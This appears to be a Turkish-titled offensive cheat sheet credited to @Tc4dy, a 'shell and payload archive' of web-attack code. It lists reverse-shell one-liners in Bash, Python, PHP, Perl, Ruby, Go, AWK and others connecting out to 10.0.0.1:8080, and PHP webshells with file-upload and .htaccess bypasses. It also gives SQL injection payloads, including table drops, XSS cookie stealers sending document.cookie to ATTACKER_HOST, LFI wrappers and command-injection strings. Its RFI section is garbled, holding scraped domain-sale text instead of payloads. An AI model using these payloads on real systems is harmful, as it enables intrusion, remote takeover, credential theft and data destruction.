🧨 SHELL & PAYLOAD ARŞİVİ
🐚 1. REVERSE SHELL KODLARI
Bash
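# Bash reverse shell, variant 1. /dev/tcp/HOST/PORT is a bash-only pseudo-device: this
# line fails under dash/busybox sh, so wrap it as `bash -c '…'` when the target's /bin/sh
# is not bash. 10.0.0.1:8080 is your listener (e.g. `nc -lvnp 8080`) — replace it.
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
# Variant 2: opens the socket on fd 5, reads one command per line and runs it. No tty, and
# each line is word-split by the shell, so quoting inside the sent commands is unreliable.
# `read -r` keeps backslashes in the received line intact.
exec 5<>/dev/tcp/10.0.0.1/8080; cat <&5 | while read -r line; do $line 2>&5 >&5; done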
Netcat
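# Netcat reverse shell. `-e` exists only in netcat-traditional and ncat (nmap); the OpenBSD
# netcat that Debian/Ubuntu install by default has no -e, so this silently fails there.
nc -e /bin/sh 10.0.0.1 8080
# Portable variant without -e: a named pipe carries nc's input back into the shell.
# /tmp/f is a fixed, world-visible path; `rm -f` avoids an error when it does not exist yet.
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 8080 >/tmp/f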
Python
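# Python reverse shell: connects, dup2()s the socket over fd 0/1/2 and execs an interactive sh.
# `python` is often missing or 2.x-only on current hosts — try `python3` explicitly.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Variant with pty.spawn(): the shell gets a pseudo-terminal, which sudo/ssh/editors need.
# Host and port come from the environment so the one-liner itself never has to be edited.
export RHOST="10.0.0.1";export RPORT=8080;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'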
PHP
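<?php // 1. Delegates to bash's /dev/tcp redirection — bash must exist on the target and exec() must not be listed in disable_functions.
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'"); ?>
<?php // 2. Needs a netcat that supports -e (netcat-traditional or ncat; the OpenBSD nc does not).
system("nc -e /bin/sh 10.0.0.1 8080"); ?>
<?php // 3. Assumes the fsockopen() socket is file descriptor 3 — true for php-cli and usually CGI, NOT guaranteed
// under mod_php/php-fpm, which already hold other descriptors; confirm with your listener before relying on it.
// $sock must stay assigned: dropping the reference closes the socket before the shell starts.
$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3"); ?>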
Perl
perlperl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby
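# Ruby reverse shell: reads one line per command from the socket and runs it with IO.popen.
# Not an interactive shell: no tty, and only stdout comes back (IO.popen in "r" mode does not
# capture stderr, which stays on the target's own stderr).
ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1",8080);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# Same loop, but `exit if fork` detaches it so the calling process returns immediately.
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.0.1",8080);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'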
PowerShell (Windows)
powershellpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc 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
Java (Groovy script)
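// This is Groovy (Jenkins script console and the like), not plain Java: the untyped `r =` / `p =`
// assignments and the `[...] as String[]` coercion are Groovy syntax. A plain-Java equivalent
// needs `String[] cmd = {...}; Process p = Runtime.getRuntime().exec(cmd);`.
// The bash loop must reach bash verbatim, so `$line` is escaped: inside a Groovy double-quoted
// string an unescaped `$line` is interpolated as a (non-existent) Groovy variable and throws
// MissingPropertyException before anything runs.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5|while read line;do \$line 2>&5 >&5;done"] as String[])
p.waitFor()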
Node.js
javascriptrequire('child_process').exec('bash -c "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"')
Golang
goecho 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.0.0.1:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/shell.go && go run /tmp/shell.go
Telnet
bashtelnet 10.0.0.1 8080 | /bin/sh | telnet 10.0.0.1 8081
AWK
bashawk 'BEGIN{s="/inet/tcp/0/10.0.0.1/8080";while(1){s|&getline c;close(s);system(c)}}'
Socat
bashsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:8080
Xterm
bashxterm -display 10.0.0.1:0
PHP (Webshell)
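<?php // Minimal webshell: runs ?cmd=… taken from GET, POST or cookie ($_REQUEST) and stops rendering the page.
// Blue-team note: user input flowing straight into system/exec/shell_exec/passthru is exactly what
// webshell scanners and WAF rules key on — grep web roots for these patterns.
if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = $_REQUEST['cmd']; system($cmd); echo "</pre>"; die; } ?>
<?php // One-liners; each requires that php.ini's disable_functions does not list the call used.
system($_GET['c']); ?>
<?php echo shell_exec($_GET['c']); ?>
<?php passthru($_GET['c']); ?>
<?php // Reverse shell (same as the fsockopen variant in section 1): assumes the socket is fd 3 — not guaranteed
// under mod_php/php-fpm, verify with a listener. $sock must stay assigned or the socket closes before exec().
$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");?>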
🐍 2. SQL PAYLOAD (SQL INJECTION)
Union Based
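-- UNION-based extraction (MySQL-style syntax). Add NULLs until the query stops erroring to learn
-- the column count, then put the wanted column where a NULL was (1,2,3 show which ones render).
-- NB: in MySQL a `--` comment must be followed by whitespace; if a trailing space is stripped in
-- transit, send `-- -` or `--+` (URL-encoded space) instead.
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--
' UNION SELECT 1,2,table_name FROM information_schema.tables--
' UNION SELECT 1,2,column_name FROM information_schema.columns WHERE table_name='users'--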
Error Based
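-- Error-based (MySQL only): extractvalue()/updatexml() echo their XPath argument in the error
-- message; the 0x7e ('~') prefix makes the leaked value easy to spot. The error text is
-- truncated to 32 characters, so page through longer values with substring().
' AND extractvalue(1,concat(0x7e,database()))--
' AND updatexml(1,concat(0x7e,database()),1)--
-- Duplicate-key technique (COUNT(*)/RAND(0)/GROUP BY collision). The `SELECT *` form yields two
-- columns inside a boolean operand, which MySQL may reject with "Operand should contain 1 column"
-- before the duplicate-entry error fires; the `SELECT 1 FROM (...)` form on the next line is the
-- reliable one.
' AND (SELECT * FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--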
Boolean Based
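-- Boolean-based: diff the response to a true (1=1) and a false (1=2) condition.
-- Comment terminators differ per engine: `--` needs a trailing space on MySQL (hence the
-- `-- -` variant), `#` is MySQL-only, and an unterminated `/*` is tolerated by MySQL.
' AND 1=1--
' AND 1=2--
' OR '1'='1'--
' OR 1=1--
' OR 1=1-- -
' OR 1=1#
' OR 1=1/*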
Time Based
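-- Time-based blind (MySQL/MariaDB syntax). SLEEP() and BENCHMARK() do not exist elsewhere:
-- use pg_sleep(5) on PostgreSQL and WAITFOR DELAY '0:0:5' on MSSQL. BENCHMARK's delay is
-- CPU-dependent, so calibrate the iteration count against a known-true baseline.
' AND SLEEP(5)--
' OR SLEEP(5)--
' AND BENCHMARK(10000000,MD5(1))--
-- Subquery form, typically used where a bare SLEEP() is not evaluated (e.g. UPDATE/INSERT contexts).
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--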
Stacked Queries
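-- Stacked queries — DESTRUCTIVE. DROP/INSERT/UPDATE modify the target's data; never run them on
-- an engagement without explicit written authorization, prefer read-only proof of exploitation.
-- Stacking needs driver support: MSSQL and PostgreSQL allow it, PHP's mysqli_query() does not
-- (mysqli_multi_query() does); PDO depends on driver and emulation settings.
'; DROP TABLE users;--
'; INSERT INTO admin VALUES('hacker','pass');--
'; UPDATE users SET password='hacked' WHERE username='admin';--
-- MySQL webshell drop: needs the FILE privilege, secure_file_priv unset/permissive, and a web root
-- writable by the mysqld user. The array key is quoted on purpose: a bare `$_GET[c]` is an
-- undefined constant — a warning on PHP 7, a fatal Error on PHP 8.
'; SELECT * INTO OUTFILE '/var/www/shell.php' FROM (SELECT '<?php system($_GET["c"]);?>')a;--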
WAF Bypass Payloads
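-- WAF / filter evasion (MySQL-centric). `/*!…*/` versioned comments and XOR are MySQL-only;
-- `%2527` / `%2520` are double-URL-encoded and only work when the application decodes twice;
-- case changes defeat naive case-sensitive blocklists. The first line has no opening quote —
-- it is for numeric (unquoted) injection points.
/*!UNION*/ /*!SELECT*/ 1,2,3--
'/**/UNION/**/SELECT/**/1,2,3--
'%20union%20select%201,2,3--
'%2527union%2520select%25201,2,3--
'||'1'||'='||'1
'||1=1--
'+or+1=1--
'+and+1=1--
' anD 1=1--
' aNd 1=2--
' XOR 1=1--
' XOR 1=2--
'/**/or/**/1=1--
'/**/and/**/1=1--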
Database Specific
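-- Engine fingerprinting. @@version exists on both MySQL and MSSQL, so it alone does not
-- distinguish them; user()/version() are MySQL and PostgreSQL specific respectively.
-- PostgreSQL and Oracle enforce matching column types across a UNION — swap the literal 2,3 for
-- NULL when the original columns are not numeric. Oracle needs a FROM clause on every SELECT
-- (`FROM dual` when no table applies); the two Oracle lines already have one.
-- MySQL
' UNION SELECT @@version,2,3--
' UNION SELECT user(),2,3--
-- PostgreSQL
' UNION SELECT version(),2,3--
' UNION SELECT current_user,2,3--
-- MSSQL
' UNION SELECT @@version,2,3--
' UNION SELECT system_user,2,3--
-- Oracle
' UNION SELECT banner,2,3 FROM v$version--
' UNION SELECT username,2,3 FROM all_users--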
💀 3. UPLOAD SHELL (File Upload Bypass)
PHP Shell
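<?php // Command shell via query string — system() must not be in disable_functions.
system($_GET['c']); ?>
<?php // eval() expects raw PHP code in the POST body without an opening tag, e.g. c=phpinfo();
eval($_POST['c']); ?>
<?php // assert() evaluated a string argument as code only up to PHP 7.x (deprecated in 7.2,
// removed in 8.0); on PHP 8 this line is useless.
assert($_POST['c']); ?>
<?php // Dropper: writes a second shell into the current directory, which the web server user must be able to write to.
file_put_contents('shell.php','<?php system($_GET["c"]);?>'); ?>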
Extension Bypass (Bypass Uzantı)
shell.php.jpg
shell.php;.jpg
shell.php%00.jpg
shell.php.jpeg
shell.php.png
shell.php.gif
shell.php.asp
shell.aspx.jpg
(Double extensions only execute where the server maps every extension in the name, e.g. Apache `AddHandler` on .php; the `;` form targets IIS 6 path parsing; `%00` null-byte truncation was fixed in PHP 5.3.4 and does not work on current PHP.)
Bypass Magic Bytes
GIF89a;
<?php system($_GET['c']); ?>

%PNG
<?php system($_GET['c']); ?>

ÿØÿà JFIF
<?php system($_GET['c']); ?>
(Prepending an image magic header only defeats checks that sniff the leading bytes. The real PNG signature is 89 50 4E 47 0D 0A 1A 0A — the "%PNG" text above is an approximation; the JPEG line is the latin-1 rendering of FF D8 FF E0, whose 00 10 length bytes before "JFIF" were lost in extraction. Write the bytes with printf or a hex editor instead of pasting this text.)
.htaccess Shell
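# .htaccess tricks. Both need AllowOverride to permit these directives in the upload directory
# and PHP running as mod_php: `php_value` does not exist under php-fpm/FastCGI, where the PHP
# handler is mapped differently and AddType alone will not make .jpg execute.
# Serve uploaded .jpg files as PHP.
AddType application/x-httpd-php .jpg
# Alternative: append shell.jpg to the output of every PHP page served from this directory.
php_value auto_append_file shell.jpg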
🔥 4. XSS PAYLOAD
Basic
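<!-- Basic XSS probes. alert(1) is only a canary; the finding is the injection context, not the popup. -->
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<!-- autofocus fires onfocus without any user interaction -->
<input onfocus=alert(1) autofocus>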
WAF Bypass
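<!-- Filter evasion. Mixed case defeats case-sensitive blocklists (tag names are case-insensitive).
     The two <img> lines below are identical to the basic payload in this copy: the original
     encoded variants of the onerror handler were flattened by HTML decoding on the page. -->
<ScRiPt>alert(1)</sCrIpT>
<img src=x onerror=alert(1)>
<img src=x onerror=alert(1)>
<!-- `/` in place of whitespace before the attribute -->
<svg/onload=alert(1)>
<!-- javascript: URL in a frame; blocked by any CSP that disallows inline script / javascript: URLs -->
<iframe src=javascript:alert(1)>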
Cookie Stealer
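<!-- Cookie exfiltration. attacker.com is a REAL third-party (parked) domain — the RFI section of this
     page even shows its for-sale preview — so never point payloads at it: use a host you control
     (ATTACKER_HOST below) over HTTPS. document.cookie cannot read HttpOnly cookies, so this only
     helps when the session cookie lacks that flag. -->
<!-- Redirect-based: reliable, but the victim sees the navigation -->
<script>document.location='http://ATTACKER_HOST/steal.php?cookie='+document.cookie</script>
<!-- fetch-based: silent; a cross-origin GET is still sent even though the response is opaque -->
<img src=x onerror="fetch('http://ATTACKER_HOST/steal?c='+document.cookie)">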
🎯 5. LFI/RFI PAYLOAD
LFI Basic
../../../../etc/passwd
....//....//....//etc/passwd
..\..\..\..\windows\win.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
(The `....//` form survives a single non-recursive strip of `../`; `%252f` is double-encoded and needs two decodes; `%c0%af` is an overlong UTF-8 `/` that only lax decoders accept. Four `../` is a guess — add more until you reach the root.)
Wrapper
php://filter/convert.base64-encode/resource=config.php
php://filter/read=convert.base64-encode/resource=index.php
expect://id
file:///etc/passwd
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=
zip://shell.jpg%23shell.php
(php://filter needs no special configuration and is the standard way to read PHP source through an LFI; expect:// requires the rarely installed expect extension; data:// — like any remote include — needs allow_url_include=On. The data: payload decodes to `<?php system($_GET[c]); ?>`, where the bare `c` is an undefined constant that PHP 8 rejects with a fatal Error — re-encode it with `$_GET["c"]` before use. zip:// needs an archive you already placed on the target; %23 is the `#` separating the archive path from the member name.)
RFI
textAttacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
attacker.com
🔓 6. COMMAND INJECTION
Basic
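# Command-injection separators. `;` `|` `||` `&` `&&` chain a second command after the injected
# one; backticks and $(...) substitute inside the argument itself. Mind the semantics: `&`
# backgrounds the original command instead of waiting for it, `||` runs `id` only if the
# original command FAILS, `&&` only if it succeeds.
; id
| id
|| id
& id
&& id
`id`
$(id)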
WAF Bypass
%0aid
%0aid%0a
%0aid%0a%0a
%0Aid%0A
%0aid%0a%23
%0Aid%0A%23
;${IFS}id
;${IFS}id${IFS}
(URL-encoded forms: %0a/%0A is a newline, which separates commands when `;` and `|` are filtered; %23 is `#`, commenting out whatever the application appends after the injection; ${IFS} stands in for a space when spaces are stripped.)
Reverse Shell
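# Reverse shells delivered through an injection point — the section-1 one-liners prefixed with `;`.
# When the string travels in a query parameter, URL-encode the whole thing (`;`→%3B, space→%20,
# `&`→%26, quotes) or the parameter parser splits it. Same prerequisites as before: nc with -e,
# bash for /dev/tcp, a python binary respectively.
; nc -e /bin/sh 10.0.0.1 8080
; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'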
@Tc4dy | github.com/tc4dy